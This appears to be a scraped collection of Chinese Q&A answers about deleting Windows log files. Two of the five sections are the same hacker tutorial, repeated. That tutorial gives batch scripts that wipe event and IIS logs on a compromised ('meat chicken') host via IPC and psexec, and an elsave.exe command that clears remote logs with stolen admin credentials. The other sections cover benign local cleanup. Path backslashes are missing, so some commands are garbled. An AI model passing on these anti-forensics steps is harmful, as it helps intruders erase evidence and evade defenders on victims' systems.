① 關於日誌文件的清除。
說實話我不太懂,幫你 找到這篇文章,你研究一下好了:
什麼是日誌文件?它是一些文件系統集合,依靠建立起的各種數據的日誌文件而存在。在任何系統發生崩潰或需要重新啟動時,數據就遵從日誌文件中的信息記錄原封不動進行恢復。日誌對於系統安全的作用是顯而易見的,無論是網路管理員還是 黑客都非常重視日誌,一個有經驗的管理員往往能夠迅速通過日誌了解到系統的安全性能,而一個聰明的黑客會在入侵成功後迅速清除掉對自己不利的日誌。無論是攻還是防,日誌的重要性由此可見。下面我們就來簡單討論一下日誌文件的清除方法。
一、日誌文件的位置
Windows 2000的系統日誌文件有應用程序日誌,安全日誌、系統日誌、DNS伺服器日誌等等,應用程序日誌、安全日誌、系統日誌、DNS日誌默認位置:%systemroot%system32config。
安全日誌文件:%systemroot%system32configSecEvent.EVT
系統日誌文件:%systemroot%system32configSysEvent.EVT
應用程序日誌文件:%systemroot%system32configAppEvent.EVT
有的管理員很可能將這些日誌重定位(所以日誌可能不在上面那些位置),其中EVENTLOG下面有很多的子表,在裡面可查到以上日誌的定位目錄。
二、清除自己電腦中的日誌
如果你要清除自己電腦中的日誌,可以用管理員的身份來登錄Windows,然後在「控制面板」中進入「管理工具」,再雙擊裡面的「事件查看器」。打開後我們就可以在這里清除日誌文件了,裡面有應用程序、安全和系統日誌文件。舉個例子,比方說你想清除安全日誌,可以右鍵點擊「安全日誌」,在彈出的菜單中選擇「屬性」。接下來在彈出的對話框中,點擊下面「清除日誌」按鈕就可以清除了,如果你想以後再來清除這些日誌的話,可以將「按需要改寫尺寸」,這樣就可以在達到最大日誌尺寸時進行改寫事件了,不會提示你清除日誌。
三、清除遠程主機上的日誌
大多數情況下,IIS的日誌會忠實地記錄它接收到的任何請求(也有特殊的不被IIS記錄的攻擊),一個優秀的系統管理員會利用這點來發現入侵的企圖,保護自己的系統。所以如果你是黑客,入侵系統成功後第一件事便是清除日誌,擦去自己的形跡,這時可以用以下兩個辦法:一是自己編寫批處理文件來解決,編寫一個能清除日誌的批處理非常簡單,方法是:新建一個具有如下內容的批處理文件:
@del c:winntsystem32logfiles*.*
@del c:winntsystem32config*.evt
@del c:winntsystem32dtclog*.*
@del c:winntsystem32*.log
@del c:winntsystem32*.txt
@del c:winnt*.txt
@del c:winnt*.log
@del c:del.bat
把上面的內容保存為del.bat備用。在上面的代碼中echo是DOS下的回顯命令,在它的前面加上「@」前綴字元,表示執行時本行在命令行或DOS裡面不顯示,另外del命令大家一定清楚吧?它是刪除文件命令。
接下來再新建一個批處理文件,內容如下:
@ del.bat \%1c$
@echo 向肉雞復制本機的del.bat……OK
@psexec \%1 c:del.bat
@echo 在肉雞上運行del.bat,清除日誌文件……OK
保存為clean.bat即可,假設已經與肉雞進行了Ipc連接,然後在CMD下輸入:clean.bat 肉雞IP,即可清除肉雞上的日誌文件。
清除日誌的另外一個方法是藉助第三方軟體,如著名黑客軟體流光的開發者黑客小榕的elsave.exe,就是是一款可以遠程清除系統日誌、應用程序日誌、安全日誌的軟體,大家可以在網上下載到。elsave.exe使用起來很簡單,首先利用獲得的管理員賬號與對方建立IPC會話:net use \ip pass /user: user,然後在命令行下執行如下命令:elsave -s \ip -l application -C,這樣就刪除了安全日誌。
② Win7系統要批量刪除C盤中的log日誌文件的方法
當你在進行電腦軟體操作的時候,會產生大量日誌文件,這些文件以log為後綴,日誌文件會存放在C盤,多了會影響系統的運行速度,需要將其刪除,那麼Win7系統要如何批量刪除C盤中的log日誌文件呢?
方法
一、打開計算機,進入到C盤(系統盤);
二、然後在文件夾右上方搜索框中輸入 *.log ,這時系統就會開機搜索C盤下所有的Log 日誌文件,如下圖;
三、等到搜索完畢後,我們按下CTRL + A 快捷鍵,全選Log文件,使用del來刪除文件!
最後,我們再清空一下回收站,就可以將C盤中的.所有log日誌文件刪除干凈了!
PS:在搜索中 「*」星號 代表任意文件名,.log 表示以log為後綴的文件!
清除Win7系統C盤log日誌文件的方法就介紹到這里了,你還在一個一個的慢慢刪除日誌文件嗎?試試批量刪除吧。
③ 如何清除入侵日誌!
一、日誌文件的位置
Windows 2000的系統日誌文件有應用程序日誌,安全日誌、系統日誌、DNS伺服器日誌等等,應用程序日誌、安全日誌、系統日誌、DNS日誌默認位置:%systemroot%system32config。
安全日誌文件:%systemroot%system32configSecEvent.EVT
系統日誌文件:%systemroot%system32configSysEvent.EVT
應用程序日誌文件:%systemroot%system32configAppEvent.EVT
有的管理員很可能將這些日誌重定位(所以日誌可能不在上面那些位置),其中EVENTLOG下面有很多的子表,在裡面可查到以上日誌的定位目錄。
二、清除自己電腦中的日誌
如果你要清除自己電腦中的日誌,可以用管理員的身份來登錄Windows,然後在「控制面板」中進入「管理工具」,再雙擊裡面的「事件查看器」。打開後我們就可以在這里清除日誌文件了,裡面有應用程序、安全和系統日誌文件。舉個例子,比方說你想清除安全日誌,可以右鍵點擊「安全日誌」,在彈出的菜單中選擇「屬性」。接下來在彈出的對話框中,點擊下面「清除日誌」按鈕就可以清除了,如果你想以後再來清除這些日誌的話,可以將「按需要改寫尺寸」,這樣就可以在達到最大日誌尺寸時進行改寫事件了,不會提示你清除日誌。
三、清除遠程主機上的日誌
大多數情況下,IIS的日誌會忠實地記錄它接收到的任何請求(也有特殊的不被IIS記錄的攻擊),一個優秀的系統管理員會利用這點來發現入侵的企圖,保護自己的系統。所以如果你是黑客,入侵系統成功後第一件事便是清除日誌,擦去自己的形跡,這時可以用以下兩個辦法:一是自己編寫批處理文件來解決,編寫一個能清除日誌的批處理非常簡單,方法是:新建一個具有如下內容的批處理文件:
@del c:winntsystem32logfiles*.*
@del c:winntsystem32config*.evt
@del c:winntsystem32dtclog*.*
@del c:winntsystem32*.log
@del c:winntsystem32*.txt
@del c:winnt*.txt
@del c:winnt*.log
@del c:del.bat
把上面的內容保存為del.bat備用。在上面的代碼中echo是DOS下的回顯命令,在它的前面加上「@」前綴字元,表示執行時本行在命令行或DOS裡面不顯示,另外del命令大家一定清楚吧?它是刪除文件命令。
接下來再新建一個批處理文件,內容如下:
@ del.bat \%1c$
@echo 向肉雞復制本機的del.bat……OK
@psexec \%1 c:del.bat
@echo 在肉雞上運行del.bat,清除日誌文件……OK
保存為clean.bat即可,假設已經與肉雞進行了Ipc連接,然後在CMD下輸入:clean.bat 肉雞IP,即可清除肉雞上的日誌文件。
清除日誌的另外一個方法是藉助第三方軟體,如著名黑客軟體流光的開發者黑客小榕的elsave.exe,就是是一款可以遠程清除系統日誌、應用程序日誌、安全日誌的軟體,大家可以在網上下載到。elsave.exe使用起來很簡單,首先利用獲得的管理員賬號與對方建立IPC會話:net use \ip pass /user: user,然後在命令行下執行如下命令:elsave -s \ip -l application -C,這樣就刪除了安全日誌。
④ 電腦事件查看器中如何將「日誌清除」記錄刪除
電腦事件查看器中如何將日誌清除記錄刪除,關於這個問題需要手動的在注冊表中找到相應的日誌文件,然後進行刪除,只有這樣才可以
⑤ 電腦上安裝的收費軟體如何刪除日誌
你好
方法一:
1、打開「控制面板」,依次進入「管理工具/事件查看器/查看事件日誌」
2、打開「事件查看器」,在這里可以查到系統日誌
3、如需刪除太過久遠的日誌,右擊選擇「清除日誌」就可以了
方法二:
1、為了更加方便、快捷地清理系統日誌,我們可以下載最新版本的「CCleaner」工具
2、打開CCleaner,在左側導航窗格選擇「清潔器」面板,在右側窗格切換到「WINDOWS」選項卡
3、默認設置下,這里只會勾選「WINDOWS日誌文件」復選框,勾選「高級」小節灰色的「WINDOWS事件日誌」復選框
4、勾選這個復選框之後,會彈出一個警告對話框,提示說刪除這些事件日誌會給系統診斷帶來某些麻煩,直接點擊「確定」按鈕
5、系統分析完成之後,可以看到即將清理的WINDOWS日誌文件的體積和數量,刪除即可